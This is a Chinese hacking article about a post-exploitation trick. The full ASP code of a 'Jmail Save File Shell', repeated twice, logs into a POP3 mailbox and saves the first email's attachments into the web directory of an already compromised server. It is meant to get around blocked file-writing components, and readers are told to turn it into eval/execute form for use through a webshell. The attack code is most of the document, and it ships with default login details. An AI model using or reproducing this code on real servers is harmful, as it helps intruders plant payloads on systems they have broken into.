用Jmail写文件进硬盘
Jmail是现在非常流行的一个Mail组件,可以以简单的代码实现SMTP\POP3的功能.DVBBS\BBSXP等WEB脚本程序都有使用Jmail的选项功能.
如果当我们以某种方式获得了WEBSHELL,比如差异备份,Or MSSQL SA Inj,比如inj Datebase Viz tinyshell,Or Other Way....但是我们无法向服务器传送文件,当然前提是如果不能使用FSO\Adodb.Stream\执行(Shell.application\Wscript.shell)等方式的情况下.
这个时候在渗透的情况下似乎是一道嵌.不过Jmail一直有个Savetofile的动作,可以将Attachments保存到指定的路径..
那么很简单的了.只要涌以下的代码就可以实现了....应该算是突破Stream\Fso等方式向硬盘里写文件的方式的一种吧,来自第3方组件也算一种不错的行为.
以下方式请大家自行改成execute或eval版本..
<%
'codz by kEvin1986 [S4T]
User=Request.Form("User")
Pass=Request.Form("Pass")
Popserver=Request.Form("Popserver")
if User<>"" and Pass<>"" and Popserver<>"" then
Set objmail = CreateObject( "JMail.POP3" )
objmail.Connect User, Pass, Popserver
set objmsg=CreateObject("jmail.message")
Set objmsg = objmail.Messages.item(1)
separator = ", "
response.write "Attachment Name is: " & SaveAtta & "<br>"
objmail.Disconnect
End if
Function SaveAtta()
Set Attachments = objmsg.Attachments
separator = ", "
response.write "The size of this Attachment is: " & objmsg.size & "<br>"
For i = 0 To Attachments.Count - 1
If i = Attachments.Count - 1 Then
separator = ""
End If
Set Theatta = Attachments(i)
response.write Theatta.Name
Theatta.SaveToFile(Server.Mappath(".") & "\" & Theatta.Name)
Response.write "Oh!Hey Guy.....That's OK!"
Next
End Function
%>
<Html>
<Head>
<Title>Jmail Save File Shell</Title>
</Head>
<Body>
<Center>
<Form Method="POST">
User: <input name="User" type=text value="kevin1986"><br>
Pass: <input name="Pass" type=text value="1986lovinghuan"><br>
POP3: <input name="Popserver" type=text value="pop.163.com"><br>
<input type=submit value="Get the Attachments Of the First Mail">
</Form>
</Center>
</Body>
</Html>
'codz by kEvin1986 [S4T]
User=Request.Form("User")
Pass=Request.Form("Pass")
Popserver=Request.Form("Popserver")
if User<>"" and Pass<>"" and Popserver<>"" then
Set objmail = CreateObject( "JMail.POP3" )
objmail.Connect User, Pass, Popserver
set objmsg=CreateObject("jmail.message")
Set objmsg = objmail.Messages.item(1)
separator = ", "
response.write "Attachment Name is: " & SaveAtta & "<br>"
objmail.Disconnect
End if
Function SaveAtta()
Set Attachments = objmsg.Attachments
separator = ", "
response.write "The size of this Attachment is: " & objmsg.size & "<br>"
For i = 0 To Attachments.Count - 1
If i = Attachments.Count - 1 Then
separator = ""
End If
Set Theatta = Attachments(i)
response.write Theatta.Name
Theatta.SaveToFile(Server.Mappath(".") & "\" & Theatta.Name)
Response.write "Oh!Hey Guy.....That's OK!"
Next
End Function
%>
<Html>
<Head>
<Title>Jmail Save File Shell</Title>
</Head>
<Body>
<Center>
<Form Method="POST">
User: <input name="User" type=text value="kevin1986"><br>
Pass: <input name="Pass" type=text value="1986lovinghuan"><br>
POP3: <input name="Popserver" type=text value="pop.163.com"><br>
<input type=submit value="Get the Attachments Of the First Mail">
</Form>
</Center>
</Body>
</Html>
相关文章
EMAIL: